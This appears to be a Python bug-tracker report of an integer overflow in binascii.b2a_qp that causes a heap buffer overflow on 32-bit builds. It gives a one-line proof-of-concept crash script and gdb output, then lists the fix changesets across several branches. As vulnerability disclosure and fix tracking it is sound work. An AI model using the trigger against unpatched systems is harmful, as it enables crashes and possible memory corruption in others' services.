Thomas E Hybel reports:This vulnerability resides in /Modules/binascii.c in the functionbinascii_b2a_qp_impl. The problem is that the integer variable "odatalen" canoverflow to become a small number.The function binascii_b2a_qp_impl qp-encodes binary data. First it computes theoutput string's length in the variable "odatalen":    /* First, scan to see how many characters need to be encoded */    in = 0;    while (in < datalen) {        if ((databuf[in] > 126) || ... )        {            ...            odatalen += 3;            in++;        }        ...    }As we can see, each input character can result in more than threeoutput-characters. Then we allocate the output string:    odata = (unsigned char *) PyMem_Malloc(odatalen);And finally we encode the input-string and write the result into odata.If our string is so large that "odatalen" will wrap around and become a smallnumber, then the odata buffer will be too small to hold the data. Our input isthen copied into this too-small buffer. So the integer overflow results in aheap buffer overflow.Here's a proof-of-concept script:--- begin script ---import binasciibinascii.b2a_qp(b"\x80"*0x531dec0e) # this number gives odatalen=2--- end script ---Note that this script assumes a 32-bit system where the "odatalen" variable willbe 4 bytes wide. When run on Python-3.5.2, 32-bits, we get a segfault:(gdb) r ../poc3.pyStarting program: /home/ubuntu32/python3/Python-3.5.2/python ../poc3.pyBreakpoint 1, binascii_b2a_qp_impl (module=module@entry=0xb7c370f4,data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:14481448        odata = (unsigned char *) PyMem_Malloc(odatalen);(gdb) p odatalen$27 = 0x2(gdb) p datalen$28 = 0x531dec0e(gdb) cContinuing.Program received signal SIGSEGV, Segmentation fault.0xb7fd1f63 in to_hex (ch=0x80,s=s@entry=0x83c5fff "")    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:13331333        s[1] = "0123456789ABCDEF"[uvalue % 16];(gdb) bt#0  0xb7fd1f63 in to_hex (ch=0x80,s=s@entry=0x83c5fff "")    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1333#1  0xb7fd22fa in binascii_b2a_qp_impl (module=module@entry=0xb7c370f4,data=data@entry=0xbffff6e4, quotetabs=0x0, istext=0x1, header=0x0)    at /home/ubuntu32/python3/Python-3.5.2/Modules/binascii.c:1476#2  0xb7fd2510 in binascii_b2a_qp (module=module@entry=0xb7c370f4,args=args@entry=0xb7cbbb5c,kwargs=kwargs@entry=0x0)    at /home/ubuntu32/python3/Python-3.5.2/Modules/clinic/binascii.c.h:510#3  0x080e0ef4 in PyCFunction_Call (func=func@entry=0xb7c37534,args=args@entry=0xb7cbbb5c,kwds=kwds@entry=0x0)    atObjects/methodobject.c:98

New changesetaf42635b5ed1 by Benjamin Peterson in branch '2.7':fix possible integer overflow in binascii.b2a_qp (closes#27760)https://hg.python.org/cpython/rev/af42635b5ed1New changeset54c74212db91 by Benjamin Peterson in branch '3.3':fix possible integer overflow in binascii.b2a_qp (closes#27760)https://hg.python.org/cpython/rev/54c74212db91New changeset9822bf4bcece by Benjamin Peterson in branch '3.4':merge 3.3 (closes#27760)https://hg.python.org/cpython/rev/9822bf4bceceNew changeseta277ab6bf66b by Benjamin Peterson in branch '3.5':merge 3.4 (closes#27760)https://hg.python.org/cpython/rev/a277ab6bf66bNew changeset4a00d4ebf60f by Benjamin Peterson in branch 'default':merge 3.5 (closes#27760)https://hg.python.org/cpython/rev/4a00d4ebf60f

The patch seems correct to me.